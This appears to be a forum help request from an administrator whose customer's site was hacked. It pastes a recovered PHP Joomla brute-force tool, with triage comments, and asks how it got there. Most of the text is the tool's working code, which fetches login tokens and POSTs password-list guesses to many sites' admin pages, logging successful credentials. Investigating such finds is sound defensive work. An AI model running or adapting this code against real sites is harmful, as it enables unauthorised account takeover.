I have a customer with a hacked website.
When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):
How did the hacker put it on my system? What could it have compromised? What can I do to stop further consequences?
--- brut.php (don't run this) ---
# GaStRo
-Dz #
Joomla Speed Brute
Force
Username:
Ex: Admin ;
administrator
in , administrator , ..
sites list:
Pass list
http://Www.sec4ever.com
">
Www.sec4ever.com |
http://Www.gastro-dz.net";>Www.gastro-dz.net
GreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi - Al l
Dz Hackerz Team
";
$sites = explode("\n",file_get_contents($_FILES["sites"]["tmp_name"])); //
Get Sites !
$w0rds = explode("\n",file_get_contents($_FILES["w0rds"]["tmp_name"])); //
Get w0rdLiSt !
$Attack = new Joomla_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class & Function'z
function txt_cln($value){
    // Drop every CR and LF so a line taken from an uploaded list carries no line terminator.
    return preg_replace("/[\r\n]/", '', $value);
}
class Joomla_brute_Force{
// NOTE(review): attacker tooling recovered from a compromised host; annotated for triage only, not maintained.
// Per check_it() call the class issues two outbound HTTP requests to <site>/administrator/index.php
// (a GET in get_source(), then a POST in post()) and touches two files in the script's working
// directory: cookie.txt (curl cookie jar, see CURLOPT_COOKIEJAR below) and j0s_result.txt
// (credentials that produced a successful login). Those filenames, the hard-coded
// "Firefox/3.0.4" User-Agent string and repeated POSTs to /administrator/index.php are the
// host and network artifacts worth searching for on the server and in web/proxy logs.
// Tries one credential pair against one site and prints/records the outcome.
// Treats the response as a successful login when its body contains 'com_config'.
// eregi() dates this to PHP 5 (the function was removed in PHP 7).
public function check_it($site,$user,$pass){ // print result
if(eregi('com_config',$this->post($site,$user,$pass))){
echo "# login successful : $user:$pass -> $site";
// Working credentials are appended in clear text to j0s_result.txt -- a file a responder
// should look for, since it shows which targets the tool reported as compromised.
$f = fopen("j0s_result.txt","a+"); fwrite($f , "$user:$pass -> $site\n");
fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site"; flush();}
}
// Submits the login form: first fetches the page to obtain the hidden token (extract_token),
// then POSTs username/passwd plus the token, following redirects, with a 20 s timeout.
// Returns the raw response body (or false on curl failure) for check_it() to inspect.
public function post($site,$user,$pass){ // Post -> user & pass
$token = $this->extract_token($site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
// Cookie jar persists the session across the GET and POST; it is written to cookie.txt on disk.
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
// Pulls the first hidden input whose name is 32 hex characters and whose value is "1"
// out of the login page source (presumably the site's form token -- inferred from the
// class name, not verified here) and returns that name.
public function extract_token($site){ // get token from source for ->
function post
$source = $this->get_source($site);
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"
,$source,$token);
return $token[1][0];
}
// GET of <site>/administrator/index.php with the same cookie jar, User-Agent,
// redirect-following and timeout as post(); returns the response body.
public function get_source($site){ // get source for -> function
extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
}
?>